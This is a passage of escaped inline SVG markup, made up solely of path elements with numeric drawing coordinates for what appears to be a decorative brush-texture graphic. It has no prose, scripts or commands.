d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path 